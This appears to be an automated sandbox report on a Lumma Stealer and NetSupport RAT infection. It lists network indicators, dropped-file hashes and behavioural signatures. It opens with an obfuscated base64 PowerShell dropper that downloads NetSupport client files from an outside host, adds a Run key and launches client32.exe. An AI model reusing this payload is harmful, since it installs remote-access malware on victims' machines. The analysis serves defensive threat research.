AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 45.61.158.86:80 | 45.61.158.86 | tcp |
| US | 8.8.8.8:53 | availabkelk.store | udp |
| US | 8.8.8.8:53 | questionsmw.store | udp |
| US | 8.8.8.8:53 | soldiefieop.site | udp |
| US | 8.8.8.8:53 | abnomalrkmu.site | udp |
| US | 8.8.8.8:53 | chorusarorp.site | udp |
| US | 8.8.8.8:53 | treatynreit.site | udp |
| US | 8.8.8.8:53 | snarlypagowo.site | udp |
| US | 8.8.8.8:53 | mysterisop.site | udp |
| US | 8.8.8.8:53 | absorptioniw.site | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | sergei-esenin.com | udp |
| US | 104.21.53.8:443 | sergei-esenin.com | tcp |
Files
memory/2904-0-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2736-6-0x0000000002920000-0x0000000002948000-memory.dmp
memory/2736-10-0x0000000002968000-0x0000000002970000-memory.dmp
memory/2736-13-0x0000000002970000-0x0000000002978000-memory.dmp
memory/2736-30-0x0000000002960000-0x0000000002968000-memory.dmp
memory/2736-29-0x00000000029C0000-0x00000000029C8000-memory.dmp
memory/2736-28-0x0000000002958000-0x0000000002960000-memory.dmp
memory/2736-27-0x00000000029B8000-0x00000000029C0000-memory.dmp
memory/2736-34-0x00000000029C8000-0x00000000029D0000-memory.dmp
memory/2736-36-0x00000000029D0000-0x00000000029D8000-memory.dmp
memory/2736-38-0x00000000029D8000-0x00000000029E0000-memory.dmp
memory/2736-40-0x00000000029E0000-0x00000000029E8000-memory.dmp
memory/2736-42-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2736-43-0x00000000029E8000-0x00000000029F0000-memory.dmp
memory/2736-47-0x00000000029F0000-0x00000000029F8000-memory.dmp
memory/2736-46-0x0000000002920000-0x0000000002948000-memory.dmp
memory/2736-51-0x00000000029F8000-0x0000000002A00000-memory.dmp
memory/2736-50-0x0000000002968000-0x0000000002970000-memory.dmp
memory/2736-55-0x0000000002A00000-0x0000000002A08000-memory.dmp
memory/2736-54-0x0000000002970000-0x0000000002978000-memory.dmp
memory/2736-61-0x0000000002A08000-0x0000000002A10000-memory.dmp
memory/2736-60-0x00000000029C0000-0x00000000029C8000-memory.dmp
memory/2736-59-0x0000000002958000-0x0000000002960000-memory.dmp
memory/2736-58-0x00000000029B8000-0x00000000029C0000-memory.dmp
memory/2736-65-0x0000000002A10000-0x0000000002A18000-memory.dmp
memory/2736-68-0x0000000002A18000-0x0000000002A20000-memory.dmp
memory/2736-67-0x00000000029C8000-0x00000000029D0000-memory.dmp
memory/2736-72-0x0000000002A20000-0x0000000002A28000-memory.dmp
memory/2736-71-0x00000000029D0000-0x00000000029D8000-memory.dmp
memory/2736-77-0x00000000029D8000-0x00000000029E0000-memory.dmp
memory/2736-78-0x0000000002A28000-0x0000000002A30000-memory.dmp
memory/2736-83-0x0000000002A30000-0x0000000002A38000-memory.dmp
memory/2736-82-0x00000000029E0000-0x00000000029E8000-memory.dmp
memory/2736-87-0x0000000002A38000-0x0000000002A40000-memory.dmp
memory/2736-86-0x00000000029E8000-0x00000000029F0000-memory.dmp
memory/2736-91-0x0000000002A40000-0x0000000002A48000-memory.dmp
memory/2736-90-0x00000000029F0000-0x00000000029F8000-memory.dmp
memory/2736-95-0x0000000002A48000-0x0000000002A50000-memory.dmp
memory/2736-94-0x00000000029F8000-0x0000000002A00000-memory.dmp
memory/2736-98-0x0000000002A50000-0x0000000002A58000-memory.dmp
memory/2736-97-0x0000000002A00000-0x0000000002A08000-memory.dmp
memory/2736-112-0x0000000002A10000-0x0000000002A18000-memory.dmp
memory/2736-111-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-110-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-109-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-108-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-107-0x0000000002A08000-0x0000000002A10000-memory.dmp
memory/2736-115-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2736-130-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2736-146-0x0000000002A18000-0x0000000002A20000-memory.dmp
memory/2736-156-0x0000000002A20000-0x0000000002A28000-memory.dmp
memory/2736-159-0x0000000002A28000-0x0000000002A30000-memory.dmp
memory/2736-160-0x0000000002A30000-0x0000000002A38000-memory.dmp
memory/2736-161-0x0000000002A38000-0x0000000002A40000-memory.dmp
memory/2736-163-0x0000000002A40000-0x0000000002A48000-memory.dmp
memory/2736-164-0x0000000002A48000-0x0000000002A50000-memory.dmp
memory/2736-165-0x0000000002A50000-0x0000000002A58000-memory.dmp
memory/2736-168-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-169-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-170-0x0000000000480000-0x000000000048A000-memory.dmp
memory/2736-171-0x0000000000480000-0x000000000048A000-memory.dmp
\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\vlc.exe
| MD5 | e634616d3b445fc1cd55ee79cf5326ea |
| SHA1 | ca27a368d87bc776884322ca996f3b24e20645f4 |
| SHA256 | 1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937 |
| SHA512 | 7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90 |
C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\libvlc.dll
| MD5 | 4b262612db64f26ea1168ca569811110 |
| SHA1 | 8e59964d1302a3109513cd4fd22c1f313e79654c |
| SHA256 | a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f |
| SHA512 | 9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7 |
C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\libvlccore.dll
| MD5 | 5bdff9dac8efdfedd169125e415a4111 |
| SHA1 | 51bca77b201aa86b53735290c91bf4180cefe28e |
| SHA256 | d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd |
| SHA512 | 12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575 |
C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\ulgbkv
| MD5 | 8f37e80238556701210f07b7bbf91106 |
| SHA1 | b4593b7bd699bf461a568898e6b04f071476c8dd |
| SHA256 | 25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6 |
| SHA512 | df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e |
C:\Users\Admin\AppData\Local\Temp\40be52e41f5e3624fc9f4e60a8e3d6b7\bmrrr
| MD5 | d78f6cce7dd76163e1af90c2287b7a04 |
| SHA1 | 166e4715075b449fd6b9cde5ee06b66a2df050d2 |
| SHA256 | e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1 |
| SHA512 | 741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f |
memory/1516-206-0x000007FEF5F40000-0x000007FEF6098000-memory.dmp
memory/1516-217-0x0000000140000000-0x00000001402B5000-memory.dmp
memory/1516-216-0x000007FEF6710000-0x000007FEF6744000-memory.dmp
memory/1516-215-0x000000013F700000-0x000000013F7F8000-memory.dmp
memory/2396-225-0x000007FEF65B0000-0x000007FEF6708000-memory.dmp
memory/2736-226-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2736-229-0x0000000000210000-0x0000000000211000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 1eb710ce39c51cd352a901e3ce4d69da |
| SHA1 | d8007d7f26418f51d8661ddd40880f55ede84b4f |
| SHA256 | ca2753118c41e5d15d73f599354f159c365dec1dfd5f87486f0099f76acd515b |
| SHA512 | 43bd805a025fb03fc497a1484afb88020b2b7d0312ae52d002472586226edd674764afa189fb8f079c289cd3daed3fd626fb8a11c03dc70b781b620bd0bf8ffb |
C:\Users\Admin\AppData\Local\Temp\6cd0f015edbf57b8da5aae821d13b6dc.pdf
| MD5 | acfffe6de49ab6bbcb590e95d558111b |
| SHA1 | 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34 |
| SHA256 | fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217 |
| SHA512 | 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e |
memory/2736-258-0x0000000002A50000-0x0000000002A58000-memory.dmp
memory/2736-257-0x0000000002A48000-0x0000000002A50000-memory.dmp
memory/2736-256-0x0000000002A40000-0x0000000002A48000-memory.dmp
memory/2736-255-0x0000000002A38000-0x0000000002A40000-memory.dmp
memory/2736-254-0x0000000002A30000-0x0000000002A38000-memory.dmp
memory/2736-253-0x0000000002A28000-0x0000000002A30000-memory.dmp
memory/2736-252-0x0000000002A20000-0x0000000002A28000-memory.dmp
memory/2736-251-0x0000000002A18000-0x0000000002A20000-memory.dmp
memory/2736-250-0x0000000002A10000-0x0000000002A18000-memory.dmp
memory/2736-249-0x0000000002A08000-0x0000000002A10000-memory.dmp
memory/2736-248-0x0000000002A00000-0x0000000002A08000-memory.dmp
memory/2736-247-0x00000000029F8000-0x0000000002A00000-memory.dmp
memory/2736-246-0x00000000029F0000-0x00000000029F8000-memory.dmp
memory/2736-245-0x00000000029E8000-0x00000000029F0000-memory.dmp
memory/2736-244-0x00000000029E0000-0x00000000029E8000-memory.dmp
memory/2736-243-0x00000000029D8000-0x00000000029E0000-memory.dmp
memory/2736-242-0x00000000029D0000-0x00000000029D8000-memory.dmp
memory/2736-241-0x00000000029C8000-0x00000000029D0000-memory.dmp
memory/2736-240-0x00000000029C0000-0x00000000029C8000-memory.dmp
memory/2736-239-0x0000000002958000-0x0000000002960000-memory.dmp
memory/2736-238-0x00000000029B8000-0x00000000029C0000-memory.dmp
memory/2736-237-0x0000000002970000-0x0000000002978000-memory.dmp
memory/2736-236-0x0000000002968000-0x0000000002970000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 8758081539cb84f9ae2ab4d49dbcece2 |
| SHA1 | b5062da4d554a96f8553e2f364c8e2cac487cdc3 |
| SHA256 | 95edccefdb29c534ec6ec58a31ef5f24cb8107dffe9a80839b51c3ad385bc8f7 |
| SHA512 | bba169e7aea9a80efd2a2a6e0c3ee125db77bd1346f2d00b966fd63cb91c0981ddf137ed3d6dbb810072dee1f5cfb2c6f2084b61af3b641a6027abcab234d97e |
memory/2396-274-0x000007FEF65B0000-0x000007FEF6708000-memory.dmp
memory/2396-276-0x000000013FB60000-0x000000013FC58000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7e12ea90
| MD5 | 23fd6cadeacff092eacd4046d11d34d1 |
| SHA1 | 10cfd220d342b555b5ced1f6211b30d00dc603a7 |
| SHA256 | 6a841014e97453623af056b8e1a0a5905a5450875de973cc4fc796ec90d4e375 |
| SHA512 | 24b2995ba5d26aa1f7a1d3d7a543d3435a8d536d7c6305b977c98acdcb5933aefb2606b145167f65e01452bea34b8d22d78459b80b90840bdf50e3cefcaf6d8e |
memory/2396-278-0x0000000140000000-0x00000001402B5000-memory.dmp
memory/2184-281-0x0000000076F20000-0x00000000770C9000-memory.dmp
memory/2184-282-0x0000000074110000-0x0000000074284000-memory.dmp
memory/1940-284-0x0000000076F20000-0x00000000770C9000-memory.dmp
memory/1940-285-0x0000000000400000-0x0000000000465000-memory.dmp
memory/1940-286-0x0000000000400000-0x0000000000465000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab51DA.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar520B.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:14
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Lumma Stealer, LummaC
NetSupport
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4528 set thread context of 3624 | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | C:\Windows\SysWOW64\cmd.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\TempControll\client32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
